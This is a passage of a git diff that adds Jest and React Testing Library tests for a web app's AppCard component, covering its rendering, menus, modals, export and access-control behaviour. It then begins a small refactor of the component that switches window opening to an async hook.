============================================================================ + +describe('AppCard', () => { + const mockApp = createMockApp() + const mockOnRefresh = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + mockOpenAsyncWindow.mockReset() + mockWebappAuthEnabled = false + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render() + // Use title attribute to target specific element + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should display app name', () => { + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should display app description', () => { + render() + expect(screen.getByTitle('Test app description')).toBeInTheDocument() + }) + + it('should display author name', () => { + render() + expect(screen.getByTitle('Test Author')).toBeInTheDocument() + }) + + it('should render app icon', () => { + // AppIcon component renders the emoji icon from app data + const { container } = render() + // Check that the icon container is rendered (AppIcon renders within the card) + const iconElement = container.querySelector('[class*="icon"]') || container.querySelector('img') + expect(iconElement || screen.getByText(mockApp.icon)).toBeTruthy() + }) + + it('should render app type icon', () => { + render() + expect(screen.getByTestId('app-type-icon')).toBeInTheDocument() + }) + + it('should 
display formatted edit time', () => { + render() + expect(screen.getByText(/edited/i)).toBeInTheDocument() + }) + }) + + describe('Props', () => { + it('should handle different app modes', () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle app with tags', () => { + const appWithTags = { + ...mockApp, + tags: [{ id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }], + } + render() + // Verify the tag selector component renders + expect(screen.getByLabelText('tag-selector')).toBeInTheDocument() + }) + + it('should render with onRefresh callback', () => { + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + }) + + describe('Access Mode Icons', () => { + it('should show public icon for public access mode', () => { + const publicApp = { ...mockApp, access_mode: AccessMode.PUBLIC } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.anyone"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show lock icon for specific groups access mode', () => { + const specificApp = { ...mockApp, access_mode: AccessMode.SPECIFIC_GROUPS_MEMBERS } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.specific"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show organization icon for organization access mode', () => { + const orgApp = { ...mockApp, access_mode: AccessMode.ORGANIZATION } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.organization"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show external icon for external access mode', () => { + const externalApp = { ...mockApp, access_mode: AccessMode.EXTERNAL_MEMBERS } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.external"]') + expect(tooltip).toBeInTheDocument() + }) + }) + + describe('Card Interaction', () => { + it('should handle card click', () => { + render() + const card = screen.getByTitle('Test App').closest('[class*="cursor-pointer"]') + expect(card).toBeInTheDocument() + }) + + it('should call getRedirection on card click', () => { + const { getRedirection } = require('@/utils/app-redirection') + render() + const card = screen.getByTitle('Test App').closest('[class*="cursor-pointer"]')! 
+ fireEvent.click(card) + expect(getRedirection).toHaveBeenCalledWith(true, mockApp, mockPush) + }) + }) + + describe('Operations Menu', () => { + it('should render operations popover', () => { + render() + expect(screen.getByTestId('custom-popover')).toBeInTheDocument() + }) + + it('should show edit option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + }) + + it('should show duplicate option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.duplicate')).toBeInTheDocument() + }) + }) + + it('should show export option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.export')).toBeInTheDocument() + }) + }) + + it('should show delete option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + }) + + it('should show switch option for chat mode apps', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText(/switch/i)).toBeInTheDocument() + }) + }) + + it('should show switch option for completion mode apps', async () => { + const completionApp = { ...mockApp, mode: AppModeEnum.COMPLETION } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText(/switch/i)).toBeInTheDocument() + }) + }) + + it('should not show switch option for workflow mode apps', async () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.queryByText(/switch/i)).not.toBeInTheDocument() + }) + }) + }) + + describe('Modal Interactions', () => { + it('should open edit modal when edit button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const editButton = screen.getByText('app.editApp') + fireEvent.click(editButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + }) + + it('should open duplicate modal when duplicate button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const duplicateButton = screen.getByText('app.duplicate') + fireEvent.click(duplicateButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + }) + + it('should open confirm dialog when delete button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const deleteButton = screen.getByText('common.operation.delete') + fireEvent.click(deleteButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + }) + + it('should close confirm dialog when cancel is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const deleteButton = 
screen.getByText('common.operation.delete') + fireEvent.click(deleteButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('cancel-confirm')) + + await waitFor(() => { + expect(screen.queryByTestId('confirm-dialog')).not.toBeInTheDocument() + }) + }) + + it('should close edit modal when onHide is called', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onHide + fireEvent.click(screen.getByTestId('close-edit-modal')) + + await waitFor(() => { + expect(screen.queryByTestId('edit-app-modal')).not.toBeInTheDocument() + }) + }) + + it('should close duplicate modal when onHide is called', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onHide + fireEvent.click(screen.getByTestId('close-duplicate-modal')) + + await waitFor(() => { + expect(screen.queryByTestId('duplicate-modal')).not.toBeInTheDocument() + }) + }) + }) + + describe('Styling', () => { + it('should have correct card container styling', () => { + const { container } = render() + const card = container.querySelector('[class*="h-[160px]"]') + expect(card).toBeInTheDocument() + }) + + it('should have rounded corners', () => { + const { container } = render() + const card = container.querySelector('[class*="rounded-xl"]') + expect(card).toBeInTheDocument() + }) + }) + + describe('API Callbacks', () => { + it('should call deleteApp API when confirming delete', async () => { + render() + + // Open popover and click delete + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + // Confirm delete + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(appsService.deleteApp).toHaveBeenCalled() + }) + }) + + it('should call onRefresh after successful delete', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should handle delete failure', async () => { + (appsService.deleteApp as jest.Mock).mockRejectedValueOnce(new Error('Delete failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(appsService.deleteApp).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: expect.stringContaining('Delete failed') }) + }) + }) + + it('should 
call updateAppInfo API when editing app', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(appsService.updateAppInfo).toHaveBeenCalled() + }) + }) + + it('should call copyApp API when duplicating app', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(appsService.copyApp).toHaveBeenCalled() + }) + }) + + it('should call onPlanInfoChanged after successful duplication', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(mockOnPlanInfoChanged).toHaveBeenCalled() + }) + }) + + it('should handle copy failure', async () => { + (appsService.copyApp as jest.Mock).mockRejectedValueOnce(new Error('Copy failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(appsService.copyApp).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.newApp.appCreateFailed' }) + }) + }) + + it('should call exportAppConfig API when exporting', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(appsService.exportAppConfig).toHaveBeenCalled() + }) + }) + + it('should handle export failure', async () => { + (appsService.exportAppConfig as jest.Mock).mockRejectedValueOnce(new Error('Export failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(appsService.exportAppConfig).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.exportFailed' }) + }) + }) + }) + + describe('Switch Modal', () => { + it('should open switch modal when switch button is clicked', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + }) + + it('should close switch modal when close button is clicked', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + 
fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('close-switch-modal')) + + await waitFor(() => { + expect(screen.queryByTestId('switch-modal')).not.toBeInTheDocument() + }) + }) + + it('should call onRefresh after successful switch', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-switch-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should open switch modal for completion mode apps', async () => { + const completionApp = { ...mockApp, mode: AppModeEnum.COMPLETION } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + }) + }) + + describe('Open in Explore', () => { + it('should show open in explore option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.openInExplore')).toBeInTheDocument() + }) + }) + }) + + describe('Workflow Export with Environment Variables', () => { + it('should check for secret environment variables in workflow apps', async () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + }) + }) + + it('should show DSL export modal when workflow has secret variables', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockResolvedValueOnce({ + environment_variables: [{ value_type: 'secret', name: 'API_KEY' }], + }) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(screen.getByTestId('dsl-export-modal')).toBeInTheDocument() + }) + }) + + it('should check for secret environment variables in advanced chat apps', async () => { + const advancedChatApp = { ...mockApp, mode: AppModeEnum.ADVANCED_CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + }) + }) + + it('should close DSL export modal when onClose is called', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockResolvedValueOnce({ + environment_variables: [{ value_type: 'secret', name: 'API_KEY' }], + }) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(screen.getByTestId('dsl-export-modal')).toBeInTheDocument() + }) + + // Click close button to trigger 
onClose + fireEvent.click(screen.getByTestId('close-dsl-export')) + + await waitFor(() => { + expect(screen.queryByTestId('dsl-export-modal')).not.toBeInTheDocument() + }) + }) + }) + + describe('Edge Cases', () => { + it('should handle empty description', () => { + const appNoDesc = { ...mockApp, description: '' } + render() + expect(screen.getByText('Test App')).toBeInTheDocument() + }) + + it('should handle long app name', () => { + const longNameApp = { + ...mockApp, + name: 'This is a very long app name that might overflow the container', + } + render() + expect(screen.getByText(longNameApp.name)).toBeInTheDocument() + }) + + it('should handle empty tags array', () => { + const noTagsApp = { ...mockApp, tags: [] } + // With empty tags, the component should still render successfully + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle missing author name', () => { + const noAuthorApp = { ...mockApp, author_name: '' } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle null icon_url', () => { + const nullIconApp = { ...mockApp, icon_url: null } + // With null icon_url, the component should fall back to emoji icon and render successfully + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should use created_at when updated_at is not available', () => { + const noUpdateApp = { ...mockApp, updated_at: 0 } + render() + expect(screen.getByText(/edited/i)).toBeInTheDocument() + }) + + it('should handle agent chat mode apps', () => { + const agentApp = { ...mockApp, mode: AppModeEnum.AGENT_CHAT } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle advanced chat mode apps', () => { + const advancedApp = { ...mockApp, mode: AppModeEnum.ADVANCED_CHAT } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle apps with multiple tags', () => { + const multiTagApp = { + ...mockApp, + tags: [ + { id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }, + { id: 'tag2', name: 'Tag 2', type: 'app', binding_count: 0 }, + { id: 'tag3', name: 'Tag 3', type: 'app', binding_count: 0 }, + ], + } + render() + // Verify the tag selector renders (actual tag display is handled by the real TagSelector component) + expect(screen.getByLabelText('tag-selector')).toBeInTheDocument() + }) + + it('should handle edit failure', async () => { + (appsService.updateAppInfo as jest.Mock).mockRejectedValueOnce(new Error('Edit failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(appsService.updateAppInfo).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: expect.stringContaining('Edit failed') }) + }) + }) + + it('should close edit modal after successful edit', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should render all app 
modes correctly', () => { + const modes = [ + AppModeEnum.CHAT, + AppModeEnum.COMPLETION, + AppModeEnum.WORKFLOW, + AppModeEnum.ADVANCED_CHAT, + AppModeEnum.AGENT_CHAT, + ] + + modes.forEach((mode) => { + const testApp = { ...mockApp, mode } + const { unmount } = render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + unmount() + }) + }) + + it('should handle workflow draft fetch failure during export', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockRejectedValueOnce(new Error('Fetch failed')) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.exportFailed' }) + }) + }) + }) + + // -------------------------------------------------------------------------- + // Additional Edge Cases for Coverage + // -------------------------------------------------------------------------- + describe('Additional Coverage', () => { + it('should handle onRefresh callback in switch modal success', async () => { + const chatApp = createMockApp({ mode: AppModeEnum.CHAT }) + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + // Trigger success callback + fireEvent.click(screen.getByTestId('confirm-switch-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should render popover menu with correct styling for different app modes', async () => { + // Test completion mode styling + const completionApp = createMockApp({ mode: AppModeEnum.COMPLETION }) + const { unmount } = render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + + unmount() + + // Test workflow mode styling + const workflowApp = createMockApp({ mode: AppModeEnum.WORKFLOW }) + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + }) + + it('should stop propagation when clicking tag selector area', () => { + const multiTagApp = createMockApp({ + tags: [{ id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }], + }) + + render() + + const tagSelector = screen.getByLabelText('tag-selector') + expect(tagSelector).toBeInTheDocument() + + // Click on tag selector wrapper to trigger stopPropagation + const tagSelectorWrapper = tagSelector.closest('div') + if (tagSelectorWrapper) + fireEvent.click(tagSelectorWrapper) + }) + + it('should handle popover mouse leave', async () => { + render() + + // Open popover + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByTestId('popover-content')).toBeInTheDocument() + }) + + // Trigger mouse leave on the outer popover-content + fireEvent.mouseLeave(screen.getByTestId('popover-content')) + + await waitFor(() => { + expect(screen.queryByTestId('popover-content')).not.toBeInTheDocument() + }) + }) + + it('should handle operations menu mouse leave', async () => { + render() + + // Open popover + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() 
=> { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + + // Find the Operations wrapper div (contains the menu items) + const editButton = screen.getByText('app.editApp') + const operationsWrapper = editButton.closest('div.relative') + + // Trigger mouse leave on the Operations wrapper to call onMouseLeave + if (operationsWrapper) + fireEvent.mouseLeave(operationsWrapper) + }) + + it('should click open in explore button', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + // Verify openAsyncWindow was called with callback and options + await waitFor(() => { + expect(mockOpenAsyncWindow).toHaveBeenCalledWith( + expect.any(Function), + expect.objectContaining({ onError: expect.any(Function) }), + ) + }) + }) + + it('should handle open in explore via async window', async () => { + // Configure mockOpenAsyncWindow to actually call the callback + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise) => { + await callback() + }) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + const { fetchInstalledAppList } = require('@/service/explore') + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalledWith(mockApp.id) + }) + }) + + it('should handle open in explore API failure', async () => { + const { fetchInstalledAppList } = require('@/service/explore') + fetchInstalledAppList.mockRejectedValueOnce(new Error('API Error')) + + // Configure mockOpenAsyncWindow to call the callback and trigger error + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise, options: any) => { + try { + await callback() + } + catch (err) { + options?.onError?.(err) + } + }) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalled() + }) + }) + }) + + describe('Access Control', () => { + it('should render operations menu correctly', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + expect(screen.getByText('app.duplicate')).toBeInTheDocument() + expect(screen.getByText('app.export')).toBeInTheDocument() + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + }) + }) + + describe('Open in Explore - No App Found', () => { + it('should handle case when installed_apps is empty array', async () => { + const { fetchInstalledAppList } = require('@/service/explore') + fetchInstalledAppList.mockResolvedValueOnce({ installed_apps: [] }) + + // Configure mockOpenAsyncWindow to call the callback and trigger error + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise, options: any) => { + try { + await callback() + } + catch (err) { + options?.onError?.(err) + } + }) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalled() + }) + }) + + 
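// The openAsyncWindow simulations in this block are re-implemented inline in each spec. + // A shared helper would keep them in sync. Minimal sketch (assumes the (callback, options) + // shape these specs already exercise; adjust if the real hook contract differs): + // + //   const simulateAsyncWindow = () => + //     mockOpenAsyncWindow.mockImplementationOnce( + //       async (callback: () => Promise<string>, options?: { onError?: (e: unknown) => void }) => { + //         try { return await callback() } + //         catch (err) { options?.onError?.(err) } + //       }, + //     ) + + 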
+    it('should handle case when API throws in callback', async () => {
+      const { fetchInstalledAppList } = require('@/service/explore')
+      fetchInstalledAppList.mockRejectedValueOnce(new Error('Network error'))
+
+      // Configure mockOpenAsyncWindow to call the callback without catching
+      mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise<string>) => {
+        return await callback()
+      })
+
+      render(<AppCard app={mockApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        const openInExploreBtn = screen.getByText('app.openInExplore')
+        fireEvent.click(openInExploreBtn)
+      })
+
+      await waitFor(() => {
+        expect(fetchInstalledAppList).toHaveBeenCalled()
+      })
+    })
+  })
+
+  describe('Draft Trigger Apps', () => {
+    it('should not show open in explore option for apps with has_draft_trigger', async () => {
+      const draftTriggerApp = createMockApp({ has_draft_trigger: true })
+      render(<AppCard app={draftTriggerApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        expect(screen.getByText('app.editApp')).toBeInTheDocument()
+        // openInExplore should not be shown for draft trigger apps
+        expect(screen.queryByText('app.openInExplore')).not.toBeInTheDocument()
+      })
+    })
+  })
+
+  describe('Non-editor User', () => {
+    it('should handle non-editor workspace users', () => {
+      // Note: the default mock sets isCurrentWorkspaceEditor=true, so this covers the editor branch
+      render(<AppCard app={mockApp} onRefresh={mockOnRefresh} />)
+      expect(screen.getByTitle('Test App')).toBeInTheDocument()
+    })
+  })
+
+  describe('WebApp Auth Enabled', () => {
+    beforeEach(() => {
+      mockWebappAuthEnabled = true
+    })
+
+    it('should show access control option when webapp_auth is enabled', async () => {
+      render(<AppCard app={mockApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        expect(screen.getByText('app.accessControl')).toBeInTheDocument()
+      })
+    })
+
+    it('should click access control button', async () => {
+      render(<AppCard app={mockApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        const accessControlBtn = screen.getByText('app.accessControl')
+        fireEvent.click(accessControlBtn)
+      })
+
+      await waitFor(() => {
+        expect(screen.getByTestId('access-control-modal')).toBeInTheDocument()
+      })
+    })
+
+    it('should close access control modal and call onRefresh', async () => {
+      render(<AppCard app={mockApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.accessControl'))
+      })
+
+      await waitFor(() => {
+        expect(screen.getByTestId('access-control-modal')).toBeInTheDocument()
+      })
+
+      // Confirm access control
+      fireEvent.click(screen.getByTestId('confirm-access-control'))
+
+      await waitFor(() => {
+        expect(mockOnRefresh).toHaveBeenCalled()
+      })
+    })
+
+    it('should show open in explore when userCanAccessApp is true', async () => {
+      render(<AppCard app={mockApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        expect(screen.getByText('app.openInExplore')).toBeInTheDocument()
+      })
+    })
+
+    it('should close access control modal when onClose is called', async () => {
+      render(<AppCard app={mockApp} onRefresh={mockOnRefresh} />)
+
+      fireEvent.click(screen.getByTestId('popover-trigger'))
+      await waitFor(() => {
+        fireEvent.click(screen.getByText('app.accessControl'))
+      })
+
+      await waitFor(() => {
+        expect(screen.getByTestId('access-control-modal')).toBeInTheDocument()
+      })
+
+      // Click close button to trigger onClose
+      fireEvent.click(screen.getByTestId('close-access-control'))
+
+      await waitFor(() => {
+        expect(screen.queryByTestId('access-control-modal')).not.toBeInTheDocument()
+      })
+    })
+  })
+})
diff --git a/web/app/components/apps/app-card.tsx b/web/app/components/apps/app-card.tsx
index 8356cfd31c..8140422c0f 100644
--- a/web/app/components/apps/app-card.tsx
+++ b/web/app/components/apps/app-card.tsx
@@ -5,7 +5,7 @@ import { useContext } from 'use-context-selector'
 import { useRouter } from 'next/navigation'
 import { useTranslation } from 'react-i18next'
 import { RiBuildingLine, RiGlobalLine, RiLockLine, RiMoreFill, RiVerifiedBadgeLine } from '@remixicon/react'
-import cn from '@/utils/classnames'
+import { cn } from '@/utils/classnames'
 import { type App, AppModeEnum } from '@/types/app'
 import Toast, { ToastContext } from '@/app/components/base/toast'
 import { copyApp, deleteApp, exportAppConfig, updateAppInfo } from '@/service/apps'
@@ -27,6 +27,7 @@ import { fetchWorkflowDraft } from '@/service/workflow'
 import { fetchInstalledAppList } from '@/service/explore'
 import { AppTypeIcon } from '@/app/components/app/type-selector'
 import Tooltip from '@/app/components/base/tooltip'
+import { useAsyncWindowOpen } from '@/hooks/use-async-window-open'
 import { AccessMode } from '@/models/access-control'
 import { useGlobalPublicStore } from '@/context/global-public-context'
 import { formatTime } from '@/utils/time'
@@ -64,6 +65,7 @@ const AppCard = ({ app, onRefresh }: AppCardProps) => {
   const { isCurrentWorkspaceEditor } = useAppContext()
   const { onPlanInfoChanged } = useProviderContext()
   const { push } = useRouter()
+  const openAsyncWindow = useAsyncWindowOpen()
 
   const [showEditModal, setShowEditModal] = useState(false)
   const [showDuplicateModal, setShowDuplicateModal] = useState(false)
@@ -247,11 +249,16 @@ const AppCard = ({ app, onRefresh }: AppCardProps) => {
       props.onClick?.()
       e.preventDefault()
       try {
-        const { installed_apps }: any = await fetchInstalledAppList(app.id) || {}
-        if (installed_apps?.length > 0)
